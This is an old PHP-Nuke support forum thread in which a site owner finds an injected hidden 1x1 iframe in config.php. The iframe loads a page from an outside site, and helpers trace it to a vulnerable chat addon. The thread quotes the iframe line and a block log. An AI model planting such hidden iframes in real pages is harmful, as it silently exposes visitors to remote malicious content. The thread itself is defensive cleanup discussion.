Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Hack Attempt Script
Author Message
checksum
Hangin' Around


Joined: Jun 30, 2003
Posts: 39

PostPosted: Mon Jun 12, 2006 3:46 pm Reply with quote

Hi,
Something wierd happened to my site today, looks like I was hacked.
There is this script prompt that comes up everytime you try to access the site: Only registered users can see links on this board! Get registered or login!

I don't know what kind of script it is and where it comes from or what is causing it, I found this in my config.php file:
Code:
<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>


And there is another file that I deleted on the server root directory that was not familiar to me.

I delete it, but it is still happening.
You do not see the script prompt on Firefox, only on IE.

I am running 7.6 and have the sentinel


Last edited by checksum on Mon Jun 12, 2006 6:09 pm; edited 1 time in total 
View user's profile Send private message
hitwalker
Sells PC To Pay For Divorce


Joined:
Posts: 5661

PostPosted: Mon Jun 12, 2006 3:55 pm Reply with quote

yes indeed, it nearly trashes the browser....
but i see you have coppermine?
can you disable that?
 
View user's profile Send private message
hitwalker
PostPosted: Mon Jun 12, 2006 3:57 pm Reply with quote

btw...i still find the same hack code on your index...
 
hitwalker
PostPosted: Mon Jun 12, 2006 4:00 pm Reply with quote

the frame with code is between your chat block and donations block.
 
checksum
PostPosted: Mon Jun 12, 2006 4:24 pm Reply with quote

I uploaded a clean version of index.php,mainfile.php, config.php but it was still happening...

I just renamed the chat folder, can you check if it is still there?
 
hitwalker
PostPosted: Mon Jun 12, 2006 4:26 pm Reply with quote

its gone now.....
refresh your browser and delete history.
 
checksum
PostPosted: Mon Jun 12, 2006 4:37 pm Reply with quote

Thanks guys
 
hitwalker
PostPosted: Mon Jun 12, 2006 4:38 pm Reply with quote

YW Smile
 
checksum
PostPosted: Mon Jun 12, 2006 4:45 pm Reply with quote

I still do not know how he put that iframe in my config.php
Code:
the frame with code is between your chat block and donations block.


How did you figure this out?
 
hitwalker
PostPosted: Mon Jun 12, 2006 4:50 pm Reply with quote

well its not that easy figuring out how these idiots did that...
You should realise that there are many addons for nuke that are vunerable and that goes for chats and gallery's...

if you have addons running giving certain rights to the outside you can get hacked in many ways...
how did they isnt that important anymore...
make sure you close ever hole..

and how i found it was easy..
just by looking at your source.
 
checksum
PostPosted: Mon Jun 12, 2006 6:08 pm Reply with quote

I deleted the chat folder ( it is from flashchat addon module), I posted the hack in their forum.

I also keep getting this message everyday now, everytime sentinel blocks the IP, he changes to a new one:
Code:
Date &amp; Time: 2006-06-12 18:23:38 CDT GMT -0500

Blocked IP: 196.206.99.*
User ID: Anonymous (1)
Reason: Abuse-Author
--------------------
User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Query String: Only registered users can see links on this board! Get registered or login!
Get String: Only registered users can see links on this board! Get registered or login!
Post String: Only registered users can see links on this board! Get registered or login!
Forwarded For: none
Client IP: none
Remote Address: 196.206.99.90
Remote Port: 52254
Request Method: GET
--------------------
Who-Is for IP
OrgName:    African Network Information Center
OrgID:      AFRINIC
Address:    03B3 - 3rd Floor - Ebene Cyber Tower
Address:    Cyber City
Address:    Ebene
Address:    Mauritius
City:       Ebene
StateProv: 
PostalCode: 0001
Country:    MU

NetRange:   196.0.0.0 - 196.255.255.255
CIDR:       196.0.0.0/8
NetName:    NET196
NetHandle:  NET-196-0-0-0-0
Parent:   
NetType:    Allocated to AfriNIC
NameServer: NS1.AFRINIC.NET
NameServer: NS-SEC.RIPE.NET
NameServer: NS.LACNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
Comment:   
RegDate:    1993-05-01
Updated:    2006-04-27

OrgAbuseHandle: GENER11-ARIN
OrgAbuseName:   Generic POC
OrgAbusePhone:  +230 4666616
OrgAbuseEmail:  Only registered users can see links on this board! Get registered or login!

OrgTechHandle: GENER11-ARIN
OrgTechName:   Generic POC
OrgTechPhone:  +230 4666616
OrgTechEmail:  Only registered users can see links on this board! Get registered or login!
 
hitwalker
PostPosted: Mon Jun 12, 2006 6:11 pm Reply with quote

yeah well,welcome to the club....
they try,get blocked,they try,get blocked.....
its like a game....they continue....mostly by remote..
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Hack Attempt Script

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©